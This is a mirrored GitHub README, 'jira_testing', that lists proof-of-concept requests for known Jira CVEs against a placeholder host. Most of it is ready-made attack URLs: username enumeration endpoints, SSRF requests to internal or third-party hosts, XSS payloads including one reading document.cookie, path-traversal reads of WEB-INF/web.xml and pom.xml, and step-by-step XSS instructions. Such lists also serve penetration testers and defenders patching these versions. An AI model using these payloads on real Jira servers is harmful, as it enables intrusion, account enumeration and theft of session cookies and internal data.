Coder Social home page Coder Social logo

jira_testing's Introduction

JIRA_testing

cve-2019-8449 - Username enumeration throw informaton disclosure vulnerability

The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. https://jira.atlassian.com/browse/JRASERVER-69796 https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true


cve-2019-8451:ssrf-response-body

The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class.

https://jira.atlassian.com/browse/JRASERVER-69793?jql=labels%20%3D%20 https://victomhost/plugins/servlet/gadgets/makeRequest?url=https://victomhost:[email protected]


RCE Jira=CVE-2019–11581

https://hackerone.com/reports/706841

/secure/ContactAdministrators!default.jspa


cve-2018-20824

vulnerable to Server Side Request Forgery (SSRF). This allowed a XSS and or a SSRF attack to be performed. More information about the Atlassian OAuth plugin issue see https://ecosystem.atlassian.net/browse/OAUTH-344 . When running in an environment like Amazon EC2, this flaw can used to access to a metadata resource that provides access credentials and other potentially confidential information.

https://victomhost/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)


cve-2020-14179 :- Information disclosure

Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint. REF=https://jira.atlassian.com/browse/JRASERVER-71536 POC: https://victomhost/secure/QueryComponent!Default.jspa


cve-2020-14181 :- Enumerate user via information disclosure

Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint.

Ref=https://jira.atlassian.com/browse/JRASERVER-71560?jql=text%20~%20%22cve-2020-14181%22 POC: https://victomhost/secure/ViewUserHover.jspa

https://victomhost/ViewUserHover.jspa?username=Admin


https://hackerone.com/reports/380354 CVE-2018-5230 https://jira.atlassian.com/browse/JRASERVER-67289 HOW TO EXPLOIT: https://host/issues/?filter=-8 Go to the link above Click the "Updated Range:" text area Put your XSS payload in "More than [ ] minutes ago" (15 character payload limit) or in "In range [ ] to [ ]" (No length limit, ONLY put the payload in the first box) Click Update Payload will run. If it doesn't run chances are you used double quotes somewhere. Only use single quotes!


jira-unauthenticated-dashboards

https://victomhost/rest/api/2/dashboard?maxResults=100

jira-unauth-popular-filters https://victomhost/secure/ManageFilters.jspa?filter=popular&filterView=popular


jira-unauth-popular-filters

https://victomhost/secure/ManageFilters.jspa?filter=popular&filterView=popular https://hackerone.com/reports/197726 https://newrelic.atlassian.net/secure/ManageFilters.jspa?filterView=popular https://newrelic.atlassian.net/secure/ManageFilters.jspa?filterView=search

https://hackerone.com/reports/139970

https://host/secure/ConfigurePortalPages!default.jspa?view=popular https://host/secure/ManageFilters.jspa?filterView=search&Search=Search&filterView=search&sortColumn=favcount&sortAscending=false


Xss

/pages/%3CIFRAME%20SRC%3D%22javascript%3Aalert(‘XSS’)%22%3E.vm


CVE-2019-3403 :- user name enumeration throw information disclosure

Information disclosured vulnerability 1.()https://jira.atlassian.com/browse/JRASERVER-69242 visit the URL address,you can check the user whether is exist on this host /rest/api/2/user/picker?query=admin

So the attacker can enumerate all existing users on this jira server.


CVE-2019-8442 :- information disclosure

https://jira.atlassian.com/browse/JRASERVER-69241 visit the URL address,the server will leaking some server's information

/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml


CVE-2017-9506

https://blog.csdn.net/caiqiiqi/article/details/89017806 /plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.nl


CVE-2019-3402:[Jira]XSS in the labels gadget

/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(1)%3C%2fscript%3Et1nmk&Search=Search ConfigurePortalPages.jspa


CVE-2018-20824:[Jira]XSS in WallboardServlet through the cyclePeriod parameter

/plugins/servlet/Wallboard/?dashboardId=10100&dashboardId=10101&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=none&random=true


CVE-2017-9506

https://ecosystem.atlassian.net/browse/OAUTH-344 exploit an SSRF vulnerability in confluence and was able to perform several actions such as bypass any firewall/protection solutions, was able to perform XSPA through assessing the response times for ports, access Internal DoD Servers and internal services.

I discuss the vulnerabilities exploited in my write which you can find here, https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a

https://host/plugins/servlet/oauth/users/icon-uri?consumerUri=https://ipinfo.io/json


username and email diclose

https://host/secure/popups/UserPickerBrowser.jspa


Atlassian Jira Unauth User Enumeration (CVE-2020-36289)

Jira < 8.5.13 8.6.0 ≤ Jira < 8.13.5 8.14.0 ≤ Jira < 8.15.1

PoC:

/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin


[CVE-2021-26086] Jira Limited Local File Read

http://host/s/1xZbMTX8rN8TQTr2s4oqjh5ntOo/_/;/WEB-INF/web.xml


[CVE-2020-29453] - Pre-Auth Limited Arbitrary File Read

http://host/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml

if its not running redirecting to login panel then run it with curl


jira_testing's People

Contributors

sushantdhopat avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.